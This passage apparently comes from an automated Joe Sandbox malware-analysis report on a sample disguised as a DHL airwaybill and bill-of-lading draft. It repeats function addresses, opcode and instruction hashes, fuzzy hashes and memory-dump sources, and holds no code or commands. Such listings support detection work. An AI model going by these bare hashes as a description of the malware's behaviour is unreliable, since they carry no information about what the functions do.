                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                • Instruction ID: 425156ec4507914fe437b9a0de5f0ca2cb1f41e4f46a387ede32bf2ecb98c1a1
                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                • Instruction Fuzzy Hash: 85F0C8732046279BD73217EB8840F2BE5A5CFD5AB4F1A013DF3059B208CA608D0256D1
                Function 01BD634F Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6519bafd79af7e74a69f78c24c2de6cd4755bfd648aa13415081941c81a8f30f
                • Instruction ID: d2a2665ea6ca701e483e2496d44d72fe1cd7ee55e1b379eca32026d0a62cf91b
                • Opcode Fuzzy Hash: 6519bafd79af7e74a69f78c24c2de6cd4755bfd648aa13415081941c81a8f30f
                • Instruction Fuzzy Hash: 68014F71A10209EFDB08DFA9D591AAEB7F8FF58314F14406AF904E7350EB74DA019BA4
                Function 01BD62D6 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29a8c59c060baf9d78892c9d7c469a5a1e4ad120e2d14a0cc56fd259bc738e91
                • Instruction ID: 90204903271329ed03c6df0654f329f45607bb7b043dd81962db9ef2afdefd72
                • Opcode Fuzzy Hash: 29a8c59c060baf9d78892c9d7c469a5a1e4ad120e2d14a0cc56fd259bc738e91
                • Instruction Fuzzy Hash: CA014471A00209EFDB08DFA9D581A9EB7F8FF58314F54805AF914E7351D7749D018BA4
                Function 01BD625D Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 100c86911da998974c512fea7e9d86f411688e7f820ede472c311294b63a5003
                • Instruction ID: 1eb049dda6806f7a33cbffe50f9dc9e137ed6b528e2751b7f77a5ff7defb4c05
                • Opcode Fuzzy Hash: 100c86911da998974c512fea7e9d86f411688e7f820ede472c311294b63a5003
                • Instruction Fuzzy Hash: 40014471A10219EFCB08DFA9D591AAEB7F8FF58304F54805AF904E7351D7749901CBA4
                Function 01B3CA6F Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                • Instruction ID: e1a4293a8e13823e1c208915347a7d1a6d8f7a9255cddf3babd3ec32fbe03ccd
                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                • Instruction Fuzzy Hash: 6C012832300689ABD73AA75DC849F59BFD9FF81750F0940E6FA149F6A1E7B8C811C260
                Function 01BD61E5 Relevance: .0, Instructions: 41COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2477742896253558e091d2498e8a90e0466d3b09f348bd53b73a2d085726a8f6
                • Instruction ID: 0bdf0f1373c61a33db49e1de92bd2ac336024086a7027ab62e1f0f2d19a97794
                • Opcode Fuzzy Hash: 2477742896253558e091d2498e8a90e0466d3b09f348bd53b73a2d085726a8f6
                • Instruction Fuzzy Hash: 44014F71A00659ABDF08DFA9D545AEEBBF8FF58310F14409AE501E7390E774EA01CB94
                Function 01B863C0 Relevance: .0, Instructions: 41COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                • Instruction ID: 6479295a8db23cb03ce66f3e776038a1d1e84e84f61a1785a9a858fc0a39bcdd
                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                • Instruction Fuzzy Hash: 50F06D7220001DBFEF06AF94DD80DAF7BBEEB587A8B104164FA0092020D731DD21EBA0
                Function 01B8A4B0 Relevance: .0, Instructions: 40COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 464ce4a442b9bff73e8ebe50d10f28530ea444e7a6de86757a454c4a934f8982
                • Instruction ID: 73eb2484047ab8ecc1d2ba6b62cbf1e1ddd8e5d0e66b69c3a48e7e756231763a
                • Opcode Fuzzy Hash: 464ce4a442b9bff73e8ebe50d10f28530ea444e7a6de86757a454c4a934f8982
                • Instruction Fuzzy Hash: 4A018936100149ABCF12AE94D840EDA3F66FB4CA64F058156FE1866220C332E9B0EB91
                Function 01AFC0F0 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7dc45223003642f1e6aeaaca45ab438b466c34bcc82196e8c806f47b9af9dae
                • Instruction ID: 4c5c1f3c614efaaca29a32c884f5990ff9b646a9e0efc61d295a9fff0f34050b
                • Opcode Fuzzy Hash: c7dc45223003642f1e6aeaaca45ab438b466c34bcc82196e8c806f47b9af9dae
                • Instruction Fuzzy Hash: 29F02B712043455BF718979A8C01F2237A9E7C07A4FA5806DFB058B2C5FA71DC118399
                Function 01B3656A Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e03432c2b3a28eb20af0cbe597498fafc13984927d6e434cb5c835f9a455b5e1
                • Instruction ID: 6e81b0e4260ecb9af26fed3459c782a09733128fb069b0c19a79075970d3c527
                • Opcode Fuzzy Hash: e03432c2b3a28eb20af0cbe597498fafc13984927d6e434cb5c835f9a455b5e1
                • Instruction Fuzzy Hash: ED01A970301685ABE73E9B2CCD88F2537D4FB40B44F4601E4FA11CB5E6D728D511C210
                Function 01BA437C Relevance: .0, Instructions: 37COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                • Instruction ID: cb46a4395e2effaa8db67106cac5d8432676300f9b796e30c9cc165ae82a6f70
                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                • Instruction Fuzzy Hash: 3DF0E93534991347EB3DAA2E84A0B2FBAD5DFD0A01B4D45BC9605CB640DFA0D8048790
                Function 01B8C89D Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14cae016089235d2f7a6344c35a2f0507797685e315d2192c180c53ba86d596c
                • Instruction ID: c12a59d0a824373cc69aea4c3017ed13ba8063f1f6142c1f8abbf8617f49e3e4
                • Opcode Fuzzy Hash: 14cae016089235d2f7a6344c35a2f0507797685e315d2192c180c53ba86d596c
                • Instruction Fuzzy Hash: F4F0A4706193049FC714EF68C541A1ABBE4FF58710F84469AB894DB394E734E900C756
                Function 01B8E872 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                • Instruction ID: 42178f6bb9ba2fa2d82a3aca6a7473144c7ec6102f0fff6210b65aed87be8547
                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                • Instruction Fuzzy Hash: 6BF089337256119BD739AA4DCC80F1AB7A8EFD5E60F5A01A5A6049B264C760EC01C7D0
                Function 01B30854 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                • Instruction ID: 33171e44465e3ffd662b14420100b51a82c7d1987656d4d23adae00ecc02f6cf
                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                • Instruction Fuzzy Hash: CDF0B472610204AFE728EF25CD01F56B6E9EFE8344F1580B8A545D7164FBB0DD11D694
                Function 01B8C912 Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b01b74cb7a51a39eb66962e36d0b10207914d710af1684f7937480bc5ee6dbcd
                • Instruction ID: 67efb301e1fd5f557a7f1848e3cf2b9bc28aa84005ede41706ac44942a0f166b
                • Opcode Fuzzy Hash: b01b74cb7a51a39eb66962e36d0b10207914d710af1684f7937480bc5ee6dbcd
                • Instruction Fuzzy Hash: E6F0AF70A00209AFCB08EFA9C555A9EBBF4EF18300F008099B845EB395DB34EA01CB60
                Function 01B047FB Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 458f1ac54301ce49f45fd9091f10fce01df31ca239ee3398d56d38b50881a4bf
                • Instruction ID: 475082f312b58f6296d701e069d59425a025a634f3eb62571e5098f6f15a4671
                • Opcode Fuzzy Hash: 458f1ac54301ce49f45fd9091f10fce01df31ca239ee3398d56d38b50881a4bf
                • Instruction Fuzzy Hash: C7F0B4719167D19FE73BDB6CC044B21BFD4EB00632F094DEAD74987582D7A4DA80C650
                Function 01BC0115 Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 807a3661040e9f6d313f72bb592d247aa9062f2125e2be9d53159d6bdf1fd15f
                • Instruction ID: c7adfc61254374da9974d16796cdd14d1b7dccc5ae8d03a5620e416c3a71a99e
                • Opcode Fuzzy Hash: 807a3661040e9f6d313f72bb592d247aa9062f2125e2be9d53159d6bdf1fd15f
                • Instruction Fuzzy Hash: BDF0272A41668086CF3A7F2C68903E5AB54E795A10F0910CDF9A157605C7B88883C320
                Function 01B3C5ED Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4d6fa4fb429a95fa1669235572f23993e728311f44616e4b81dddaaa8e1de17b
                • Instruction ID: f2cbd375cd5b03053bf726fbe161748417548185fc18a73fdec3daefddd231f5
                • Opcode Fuzzy Hash: 4d6fa4fb429a95fa1669235572f23993e728311f44616e4b81dddaaa8e1de17b
                • Instruction Fuzzy Hash: 94F052714016809FE72E8BACC508B11BFD8DB807A0F08A5EBF40297522C730E8A0DA40
                Function 01B42619 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                • Instruction ID: ff10f93027c823f80e61e8d06439620b6e5e95355ad6d82e7399821cdabe0c6e
                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                • Instruction Fuzzy Hash: 47E0D8323006016BEB269E599CC0F477B6EDFD7B10F0540F9B5045F251CBE2DC0996A4
                Function 01B96030 Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                • Instruction ID: 6669a97db74a326a1c92dd82d5e655859902d6df846bed0b5e33d7ca732e3d10
                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                • Instruction Fuzzy Hash: 5CF0A0721002049FE7288F09DDC0F52BBF8EB09364F42C0B6E6088B160D339EC41CBA0
                Function 01B00710 Relevance: .0, Instructions: 28COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                • Instruction ID: 5480d641c6dd341867f688b6199d7eed3aa0686e15129b9da5027e0196bf3fa7
                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                • Instruction Fuzzy Hash: DDF0A0393047429BDB1EDF19D080BA57BE4FB413A0B0000D4FC428B351E735E981CB50
                Function 01B349D0 Relevance: .0, Instructions: 28COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                • Instruction ID: cdebb88ef663a42434476ad6f7621ea766a357bc72f42e4cbbc0bcfc6b626e35
                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                • Instruction Fuzzy Hash: 60E0D833244145ABD7391A598800B667BA9EBD17A0F160469E2008B150DB70DC52C7D8
                Function 01BD4164 Relevance: .0, Instructions: 27COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5605fb522ab9e791947c1d8ff1aae41c7af77d01658da6991a6924782a5cf5c7
                • Instruction ID: 914705585cf7f3bd43e37b4e605c36e06248fc212ee847eaa096f011d183e950
                • Opcode Fuzzy Hash: 5605fb522ab9e791947c1d8ff1aae41c7af77d01658da6991a6924782a5cf5c7
                • Instruction Fuzzy Hash: 6AF0A931A26A918FEB6ED73DE280B567BE0EB10620F4A05E4D4118BD12E334EC80C650
                Function 01BA678E Relevance: .0, Instructions: 27COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                • Instruction ID: cd915ca5b698172ed195f4547fa1eeff430247e852f5979ef8366e2c0a4b1585
                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                • Instruction Fuzzy Hash: 0FE0DF72A00120BBDF259799CD05F9ABFACDB90FA0F490094BA00E70E0E630DE00C6D0
                Function 01BD08C0 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                • Instruction ID: bb3d1387c9f84bd4abeb04a4c1d67591d7fbfdc8e2f6cc66a05752354887edf8
                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                • Instruction Fuzzy Hash: 3CE09B316417508BCB2DAA1DC141A53BFE8DF95660F1580EDE90547612E332F842C6D0
                Function 01B025E0 Relevance: .0, Instructions: 23COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ee099320da3b5753486709b03547564ad69634c7dae647086916f70439d1fab1
                • Instruction ID: 2dadcee0022683d6f31e17ee5ac388d458c262aba0bfb46f58853ce67d8bcaf6
                • Opcode Fuzzy Hash: ee099320da3b5753486709b03547564ad69634c7dae647086916f70439d1fab1
                • Instruction Fuzzy Hash: 6FE09232100A54ABCB26BF29DD01F8A7B9AEB60360F014569F115571A0CB30A810C784
                Function 01BBA456 Relevance: .0, Instructions: 23COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                • Instruction ID: fa88289dd843ed6ca44daed7c5e8b6d3e4b96501aa033b6bafd11f301ecfbd67
                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                • Instruction Fuzzy Hash: ACE09B31010611DFDB3A6F2AD948B927AE0FF50711F158C9DE09A128B0C7B4D8C0D640
                Function 01B84000 Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                • Instruction ID: 3ed41e0b8f7cff015903cedf97566c65d957e83b7c8429db51a4c4ae4985bf91
                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                • Instruction Fuzzy Hash: 51E04E753003469BE719DF19C054B667BA6FFD9A50F28C0A9A9488F205EB36A843CA51
                Function 01B3CA38 Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: de6f9a9aab5d5358aa5a9602e6c9e7009fe7f66ee59796d6302d6750ac4a65ff
                • Instruction ID: 8f49fc8adebd19fd57e88a1f13e922be7d3a481af5b051d614de9478e1779a02
                • Opcode Fuzzy Hash: de6f9a9aab5d5358aa5a9602e6c9e7009fe7f66ee59796d6302d6750ac4a65ff
                • Instruction Fuzzy Hash: 8CD0C2324810206ACB3DE1587C04F933E999B81220F0248E2F108A2019D715CCA286C4
                Function 01AF823B Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                • Instruction ID: 09f804569970e08a274a85a4325cb82785edbbae63a8afb931efdced412e96af
                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                • Instruction Fuzzy Hash: A6E08C35000A10EFDB3A2F59ED00B5176A1FB64B60F2588ADF282060A587B8A881EA44
                Function 01B02050 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cf976fa1db744bcfdc924bc197fc356d8e4d45258770b9d5776f75f2d8b9107a
                • Instruction ID: ae0734ae4f8dcf759aaf6fa02ccc2a95a7f88050bc39e93b8bb9c09301178181
                • Opcode Fuzzy Hash: cf976fa1db744bcfdc924bc197fc356d8e4d45258770b9d5776f75f2d8b9107a
                • Instruction Fuzzy Hash: 47E08C321005506BCA16FA5DDD00E8A779AEBA4360F010165F150872E4CB20AC00C794
                Function 01B38A90 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                • Instruction ID: fb6d966a9935799326d275935dcc7ca3a7a1817d4f7aeb76a002f9c9c53d519a
                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                • Instruction Fuzzy Hash: 4EE08633111A1487C729DE18D511B7277A4EF85720F09473EA61387790C634E554C795
                Function 01B56AA4 Relevance: .0, Instructions: 17COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                • Instruction ID: 7d7e1fd0851b6a070f7fd2593b2c05ee02ba14f555ffa25ae18012d3af9d0b02
                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                • Instruction Fuzzy Hash: F7D05E36511A50AFD7369F1BEA00D13BBF9FBC4B20746066EA54583924D770A806CBA0
                Function 01B3E59C Relevance: .0, Instructions: 16COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                • Instruction ID: a7a7f4824d0a4c94c8d8073acc08ec965db20ca65ecfa94b4b734faad739b373
                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
